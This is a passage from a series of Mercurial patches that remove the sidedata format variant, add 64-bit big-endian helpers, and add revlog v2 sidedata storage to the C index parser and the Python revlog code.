+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: exp-revlogv2.2, exp-sidedata-flag + added: revlogv1 processed revlogs: - all-filelogs @@ -1449,6 +1469,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) @@ -1473,9 +1494,10 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1492,17 +1514,18 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614848106 -3600 # Thu Mar 04 09:55:06 2021 +0100 # Node ID 7d9d9265d40fe8e05fe881d26e5566bdc0226af6 # Parent fd55a9eb1507dfa787e8b4ef95b3bda9fe178e0b format: remove sidedata format variant This format variant can only exist when also using revlog v2, so it's useless now. 
Differential Revision: https://phab.mercurial-scm.org/D10113 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -325,27 +325,6 @@ @registerformatvariant -class sidedata(requirementformatvariant): - name = b'sidedata' - - _requirement = requirements.REVLOGV2_REQUIREMENT - - default = False - - description = _( - b'Allows storage of extra data alongside a revision, ' - b'unlocking various caching options.' - ) - - upgrademessage = _(b'Allows storage of extra data alongside a revision.') - - @classmethod - def fromrepo(cls, repo): - assert cls._requirement is not None - return cls._requirement in repo.requirements - - -@registerformatvariant class persistentnodemap(requirementformatvariant): name = b'persistent-nodemap' diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1466,7 +1466,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no revlog-v2: no yes no @@ -1506,7 +1505,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no revlog-v2: no yes no diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,7 +39,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no @@ -54,7 +53,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -426,7 +424,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes 
yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no @@ -453,7 +450,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes yes no @@ -482,7 +478,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -56,7 +56,6 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: yes copies-sdc: no revlog-v2: no @@ -576,7 +575,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no revlog-v2: no no no @@ -622,7 +620,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no revlog-v2: no no no diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,7 +56,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -70,7 +69,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no yes no @@ -90,7 +88,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no @@ -104,7 +101,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no diff 
--git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -58,7 +58,6 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: no copies-sdc: no revlog-v2: no @@ -72,7 +71,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -86,7 +84,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -100,7 +97,6 @@ [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -142,12 +138,6 @@ { "config": false, "default": false, - "name": "sidedata", - "repo": false - }, - { - "config": false, - "default": false, "name": "persistent-nodemap", "repo": false }, @@ -313,7 +303,6 @@ generaldelta: no share-safe: no sparserevlog: no - sidedata: no persistent-nodemap: no copies-sdc: no revlog-v2: no @@ -327,7 +316,6 @@ generaldelta: no yes yes 
share-safe: no no no sparserevlog: no yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -341,7 +329,6 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -355,7 +342,6 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -1299,7 +1285,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1336,7 +1321,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1376,7 +1360,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1421,7 +1404,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - 
sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no @@ -1466,7 +1448,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1511,7 +1492,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes yes no # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1610962992 -3600 # Mon Jan 18 10:43:12 2021 +0100 # Node ID eed42f1c22d6154f931b525ee491e7ecf80f7845 # Parent 7d9d9265d40fe8e05fe881d26e5566bdc0226af6 bitmanipulation: add utils to read/write bigendian 64bit integers Differential Revision: https://phab.mercurial-scm.org/D9845 diff --git a/mercurial/bitmanipulation.h b/mercurial/bitmanipulation.h --- a/mercurial/bitmanipulation.h +++ b/mercurial/bitmanipulation.h @@ -5,6 +5,18 @@ #include "compat.h" +/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long + enough */ +static inline uint64_t getbe64(const char *c) +{ + const unsigned char *d = (const unsigned char *)c; + + return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) | + (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) | + (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) | + (((uint64_t)d[6]) << 8) | (d[7])); +} + static inline uint32_t getbe32(const char *c) { const unsigned char *d = (const unsigned char *)c; @@ -27,6 +39,20 @@ return ((d[0] << 8) | (d[1])); } +/* Writes a 64 bit integer to bytes in a big-endian format. 
+ Assumes that the buffer is long enough */ +static inline void putbe64(uint64_t x, char *c) +{ + c[0] = (x >> 56) & 0xff; + c[1] = (x >> 48) & 0xff; + c[2] = (x >> 40) & 0xff; + c[3] = (x >> 32) & 0xff; + c[4] = (x >> 24) & 0xff; + c[5] = (x >> 16) & 0xff; + c[6] = (x >> 8) & 0xff; + c[7] = (x)&0xff; +} + static inline void putbe32(uint32_t x, char *c) { c[0] = (x >> 24) & 0xff; # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611164112 -3600 # Wed Jan 20 18:35:12 2021 +0100 # Node ID 358737abeeefc68da1bbceba5f4fb27eaa5149aa # Parent eed42f1c22d6154f931b525ee491e7ecf80f7845 cext: add support for revlogv2 This enables the C code to retrieve/create entries in the revlog v2 format. This is mainly a matter of taking into account the additional slots for sidedata, etc. Differential Revision: https://phab.mercurial-scm.org/D9846 diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -638,7 +638,7 @@ PyObject *encodedir(PyObject *self, PyObject *args); PyObject *pathencode(PyObject *self, PyObject *args); PyObject *lowerencode(PyObject *self, PyObject *args); -PyObject *parse_index2(PyObject *self, PyObject *args); +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs); static PyMethodDef methods[] = { {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"}, @@ -646,7 +646,8 @@ "create a set containing non-normal and other parent entries of given " "dirstate\n"}, {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"}, - {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"}, + {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS, + "parse a revlog index\n"}, {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"}, {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"}, {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"}, diff --git 
a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -98,6 +98,7 @@ int ntlookups; /* # lookups */ int ntmisses; /* # lookups that miss the cache */ int inlined; + long hdrsize; /* size of index headers. Differs in v1 v.s. v2 format */ }; static Py_ssize_t index_length(const indexObject *self) @@ -113,14 +114,21 @@ static int index_find_node(indexObject *self, const char *node); #if LONG_MAX == 0x7fffffffL -static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v2_tuple_format = + PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else -static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v2_tuple_format = + PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. */ static const long v1_hdrsize = 64; +/* A Revlogv2 index entry is 96 bytes long. 
*/ +static const long v2_hdrsize = 96; + static void raise_revlog_error(void) { PyObject *mod = NULL, *dict = NULL, *errclass = NULL; @@ -157,7 +165,7 @@ static const char *index_deref(indexObject *self, Py_ssize_t pos) { if (pos >= self->length) - return self->added + (pos - self->length) * v1_hdrsize; + return self->added + (pos - self->length) * self->hdrsize; if (self->inlined && pos > 0) { if (self->offsets == NULL) { @@ -174,7 +182,7 @@ return self->offsets[pos]; } - return (const char *)(self->buf.buf) + pos * v1_hdrsize; + return (const char *)(self->buf.buf) + pos * self->hdrsize; } /* @@ -280,8 +288,9 @@ */ static PyObject *index_get(indexObject *self, Py_ssize_t pos) { - uint64_t offset_flags; - int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; + uint64_t offset_flags, sidedata_offset; + int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2, + sidedata_comp_len; const char *c_node_id; const char *data; Py_ssize_t length = index_length(self); @@ -320,9 +329,19 @@ parent_2 = getbe32(data + 28); c_node_id = data + 32; - return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len, - base_rev, link_rev, parent_1, parent_2, c_node_id, - self->nodelen); + if (self->hdrsize == v1_hdrsize) { + return Py_BuildValue(v1_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen); + } else { + sidedata_offset = getbe64(data + 64); + sidedata_comp_len = getbe32(data + 72); + + return Py_BuildValue(v2_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen, + sidedata_offset, sidedata_comp_len); + } } /* @@ -373,18 +392,30 @@ static PyObject *index_append(indexObject *self, PyObject *obj) { - uint64_t offset_flags; + uint64_t offset_flags, sidedata_offset; int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; - Py_ssize_t c_node_id_len; + Py_ssize_t c_node_id_len, sidedata_comp_len; const char 
*c_node_id; char *data; - if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, - &parent_2, &c_node_id, &c_node_id_len)) { - PyErr_SetString(PyExc_TypeError, "8-tuple required"); - return NULL; + if (self->hdrsize == v1_hdrsize) { + if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len)) { + PyErr_SetString(PyExc_TypeError, "8-tuple required"); + return NULL; + } + } else { + if (!PyArg_ParseTuple( + obj, v2_tuple_format, &offset_flags, &comp_len, + &uncomp_len, &base_rev, &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, &sidedata_offset, &sidedata_comp_len)) { + PyErr_SetString(PyExc_TypeError, "10-tuple required"); + return NULL; + } } + if (c_node_id_len != self->nodelen) { PyErr_SetString(PyExc_TypeError, "invalid node"); return NULL; @@ -393,15 +424,15 @@ if (self->new_length == self->added_length) { size_t new_added_length = self->added_length ? 
self->added_length * 2 : 4096; - void *new_added = - PyMem_Realloc(self->added, new_added_length * v1_hdrsize); + void *new_added = PyMem_Realloc(self->added, new_added_length * + self->hdrsize); if (!new_added) return PyErr_NoMemory(); self->added = new_added; self->added_length = new_added_length; } rev = self->length + self->new_length; - data = self->added + v1_hdrsize * self->new_length++; + data = self->added + self->hdrsize * self->new_length++; putbe32(offset_flags >> 32, data); putbe32(offset_flags & 0xffffffffU, data + 4); putbe32(comp_len, data + 8); @@ -411,7 +442,14 @@ putbe32(parent_1, data + 24); putbe32(parent_2, data + 28); memcpy(data + 32, c_node_id, c_node_id_len); + /* Padding since SHA-1 is only 20 bytes for now */ memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len); + if (self->hdrsize != v1_hdrsize) { + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + /* Padding for 96 bytes alignment */ + memset(data + 76, 0, self->hdrsize - 76); + } if (self->ntinitialized) nt_insert(&self->nt, c_node_id, rev); @@ -2563,14 +2601,17 @@ const char *data = (const char *)self->buf.buf; Py_ssize_t pos = 0; Py_ssize_t end = self->buf.len; - long incr = v1_hdrsize; + long incr = self->hdrsize; Py_ssize_t len = 0; - while (pos + v1_hdrsize <= end && pos >= 0) { - uint32_t comp_len; + while (pos + self->hdrsize <= end && pos >= 0) { + uint32_t comp_len, sidedata_comp_len = 0; /* 3rd element of header is length of compressed inline data */ comp_len = getbe32(data + pos + 8); - incr = v1_hdrsize + comp_len; + if (self->hdrsize == v2_hdrsize) { + sidedata_comp_len = getbe32(data + pos + 72); + } + incr = self->hdrsize + comp_len + sidedata_comp_len; if (offsets) offsets[len] = data + pos; len++; @@ -2586,11 +2627,13 @@ return len; } -static int index_init(indexObject *self, PyObject *args) +static int index_init(indexObject *self, PyObject *args, PyObject *kwargs) { - PyObject *data_obj, *inlined_obj; + PyObject *data_obj, 
*inlined_obj, *revlogv2; Py_ssize_t size; + static char *kwlist[] = {"data", "inlined", "revlogv2", NULL}; + /* Initialize before argument-checking to avoid index_dealloc() crash. */ self->added = NULL; @@ -2606,7 +2649,9 @@ self->nodelen = 20; self->nullentry = NULL; - if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj)) + revlogv2 = NULL; + if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist, + &data_obj, &inlined_obj, &revlogv2)) return -1; if (!PyObject_CheckBuffer(data_obj)) { PyErr_SetString(PyExc_TypeError, @@ -2618,8 +2663,22 @@ return -1; } - self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, - -1, -1, -1, -1, nullid, self->nodelen); + if (revlogv2 && PyObject_IsTrue(revlogv2)) { + self->hdrsize = v2_hdrsize; + } else { + self->hdrsize = v1_hdrsize; + } + + if (self->hdrsize == v1_hdrsize) { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, + -1, -1, -1, nullid, self->nodelen); + } else { + self->nullentry = Py_BuildValue( + PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, -1, -1, -1, + -1, nullid, self->nodelen, 0, 0); + } + if (!self->nullentry) return -1; PyObject_GC_UnTrack(self->nullentry); @@ -2641,11 +2700,11 @@ goto bail; self->length = len; } else { - if (size % v1_hdrsize) { + if (size % self->hdrsize) { PyErr_SetString(PyExc_ValueError, "corrupt index file"); goto bail; } - self->length = size / v1_hdrsize; + self->length = size / self->hdrsize; } return 0; @@ -2797,16 +2856,16 @@ }; /* - * returns a tuple of the form (index, index, cache) with elements as + * returns a tuple of the form (index, cache) with elements as * follows: * - * index: an index object that lazily parses RevlogNG records + * index: an index object that lazily parses Revlog (v1 or v2) records * cache: if data is inlined, a tuple (0, index_file_content), else None * index_file_content could be a string, or a buffer * * added complications are for backwards compatibility */ -PyObject *parse_index2(PyObject 
*self, PyObject *args) +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs) { PyObject *cache = NULL; indexObject *idx; @@ -2816,7 +2875,7 @@ if (idx == NULL) goto bail; - ret = index_init(idx, args); + ret = index_init(idx, args, kwargs); if (ret == -1) goto bail; # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1610966691 -3600 # Mon Jan 18 11:44:51 2021 +0100 # Node ID 3d740058b46787c133fd43b3f6252bfa2bae47d6 # Parent 358737abeeefc68da1bbceba5f4fb27eaa5149aa sidedata: move to new sidedata storage in revlogv2 The current (experimental) sidedata system uses flagprocessors to signify the presence and store/retrieve sidedata from the raw revlog data. This proved to be quite fragile from an exchange perspective and a lot more complex than simply having a dedicated space in the new revlog format. This change does not handle exchange (ironically), so the test for amend - that uses a bundle - is broken. This functionality is split into the next patches. 
Differential Revision: https://phab.mercurial-scm.org/D9993 diff --git a/hgext/lfs/wrapper.py b/hgext/lfs/wrapper.py --- a/hgext/lfs/wrapper.py +++ b/hgext/lfs/wrapper.py @@ -116,10 +116,10 @@ if hgmeta or text.startswith(b'\1\n'): text = storageutil.packmeta(hgmeta, text) - return (text, True, {}) + return (text, True) -def writetostore(self, text, sidedata): +def writetostore(self, text): # hg filelog metadata (includes rename, etc) hgmeta, offset = storageutil.parsemeta(text) if offset and offset > 0: diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -155,12 +155,12 @@ # text passed to "addrevision" includes hg filelog metadata header if node is None: node = storageutil.hashrevisionsha1(text, p1, p2) - if sidedata is None: - sidedata = {} meta, metaoffset = storageutil.parsemeta(text) rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata + self, + text, + flags, ) return self.addrawrevision( rawtext, diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -120,10 +120,10 @@ # Flag processors for REVIDX_ELLIPSIS. 
def ellipsisreadprocessor(rl, text): - return text, False, {} - - -def ellipsiswriteprocessor(rl, text, sidedata): + return text, False + + +def ellipsiswriteprocessor(rl, text): return text, False @@ -554,8 +554,6 @@ if self._mmaplargeindex and b'mmapindexthreshold' in opts: mmapindexthreshold = opts[b'mmapindexthreshold'] self.hassidedata = bool(opts.get(b'side-data', False)) - if self.hassidedata: - self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors self._sparserevlog = bool(opts.get(b'sparse-revlog', False)) withsparseread = bool(opts.get(b'with-sparse-read', False)) # sparse-revlog forces sparse-read @@ -856,6 +854,11 @@ def length(self, rev): return self.index[rev][1] + def sidedata_length(self, rev): + if self.version & 0xFFFF != REVLOGV2: + return 0 + return self.index[rev][9] + def rawsize(self, rev): """return the length of the uncompressed text for a given revision""" l = self.index[rev][2] @@ -917,7 +920,7 @@ # Derived from index values. def end(self, rev): - return self.start(rev) + self.length(rev) + return self.start(rev) + self.length(rev) + self.sidedata_length(rev) def parents(self, node): i = self.index @@ -1853,7 +1856,7 @@ elif operation == b'read': return flagutil.processflagsread(self, text, flags) else: # write operation - return flagutil.processflagswrite(self, text, flags, None) + return flagutil.processflagswrite(self, text, flags) def revision(self, nodeorrev, _df=None, raw=False): """return an uncompressed revision of a given node or revision @@ -1898,10 +1901,17 @@ # revision or might need to be processed to retrieve the revision. rev, rawtext, validated = self._rawtext(node, rev, _df=_df) + if self.version & 0xFFFF == REVLOGV2: + if rev is None: + rev = self.rev(node) + sidedata = self._sidedata(rev) + else: + sidedata = {} + if raw and validated: # if we don't want to process the raw text and that raw # text is cached, we can exit early. 
- return rawtext, {} + return rawtext, sidedata if rev is None: rev = self.rev(node) # the revlog's flag for this revision @@ -1910,20 +1920,14 @@ if validated and flags == REVIDX_DEFAULT_FLAGS: # no extra flags set, no flag processor runs, text = rawtext - return rawtext, {} - - sidedata = {} + return rawtext, sidedata + if raw: validatehash = flagutil.processflagsraw(self, rawtext, flags) text = rawtext else: - try: - r = flagutil.processflagsread(self, rawtext, flags) - except error.SidedataHashError as exc: - msg = _(b"integrity check failed on %s:%s sidedata key %d") - msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey) - raise error.RevlogError(msg) - text, validatehash, sidedata = r + r = flagutil.processflagsread(self, rawtext, flags) + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) if not validated: @@ -1974,6 +1978,21 @@ del basetext # let us have a chance to free memory early return (rev, rawtext, False) + def _sidedata(self, rev): + """Return the sidedata for a given revision number.""" + index_entry = self.index[rev] + sidedata_offset = index_entry[8] + sidedata_size = index_entry[9] + + if self._inline: + sidedata_offset += self._io.size * (1 + rev) + if sidedata_size == 0: + return {} + + segment = self._getsegment(sidedata_offset, sidedata_size) + sidedata = sidedatautil.deserialize_sidedata(segment) + return sidedata + def rawdata(self, nodeorrev, _df=None): """return an uncompressed raw data of a given node or revision number. 
@@ -2107,20 +2126,15 @@ if sidedata is None: sidedata = {} - flags = flags & ~REVIDX_SIDEDATA elif not self.hassidedata: raise error.ProgrammingError( _(b"trying to add sidedata to a revlog who don't support them") ) - else: - flags |= REVIDX_SIDEDATA if flags: node = node or self.hash(text, p1, p2) - rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata - ) + rawtext, validatehash = flagutil.processflagswrite(self, text, flags) # If the flag processor modifies the revision data, ignore any provided # cachedelta. @@ -2153,6 +2167,7 @@ flags, cachedelta=cachedelta, deltacomputer=deltacomputer, + sidedata=sidedata, ) def addrawrevision( @@ -2166,6 +2181,7 @@ flags, cachedelta=None, deltacomputer=None, + sidedata=None, ): """add a raw revision with known flags, node and parents useful when reusing a revision not stored in this revlog (ex: received @@ -2188,6 +2204,7 @@ ifh, dfh, deltacomputer=deltacomputer, + sidedata=sidedata, ) finally: if dfh: @@ -2281,6 +2298,7 @@ dfh, alwayscache=False, deltacomputer=None, + sidedata=None, ): """internal function to add revisions to the log @@ -2350,6 +2368,16 @@ deltainfo = deltacomputer.finddeltainfo(revinfo, fh) + if sidedata: + serialized_sidedata = sidedatautil.serialize_sidedata(sidedata) + sidedata_offset = offset + deltainfo.deltalen + else: + serialized_sidedata = b"" + # Don't store the offset if the sidedata is empty, that way + # we can easily detect empty sidedata and they will be no different + # than ones we manually add. 
+ sidedata_offset = 0 + e = ( offset_type(offset, flags), deltainfo.deltalen, @@ -2359,18 +2387,24 @@ p1r, p2r, node, - 0, - 0, + sidedata_offset, + len(serialized_sidedata), ) if self.version & 0xFFFF != REVLOGV2: e = e[:8] self.index.append(e) - entry = self._io.packentry(e, self.node, self.version, curr) self._writeentry( - transaction, ifh, dfh, entry, deltainfo.data, link, offset + transaction, + ifh, + dfh, + entry, + deltainfo.data, + link, + offset, + serialized_sidedata, ) rawtext = btext[0] @@ -2383,7 +2417,9 @@ self._chainbasecache[curr] = deltainfo.chainbase return curr - def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): + def _writeentry( + self, transaction, ifh, dfh, entry, data, link, offset, sidedata + ): # Files opened in a+ mode have inconsistent behavior on various # platforms. Windows requires that a file positioning call be made # when the file handle transitions between reads and writes. See @@ -2407,6 +2443,8 @@ if data[0]: dfh.write(data[0]) dfh.write(data[1]) + if sidedata: + dfh.write(sidedata) ifh.write(entry) else: offset += curr * self._io.size @@ -2414,6 +2452,8 @@ ifh.write(entry) ifh.write(data[0]) ifh.write(data[1]) + if sidedata: + ifh.write(sidedata) self._enforceinlinesize(transaction, ifh) nodemaputil.setup_persistent_nodemap(transaction, self) diff --git a/mercurial/revlogutils/flagutil.py b/mercurial/revlogutils/flagutil.py --- a/mercurial/revlogutils/flagutil.py +++ b/mercurial/revlogutils/flagutil.py @@ -84,7 +84,7 @@ flagprocessors[flag] = processor -def processflagswrite(revlog, text, flags, sidedata): +def processflagswrite(revlog, text, flags): """Inspect revision data flags and applies write transformations defined by registered flag processors. @@ -100,9 +100,12 @@ processed text and ``validatehash`` is a bool indicating whether the returned text should be checked for hash integrity. 
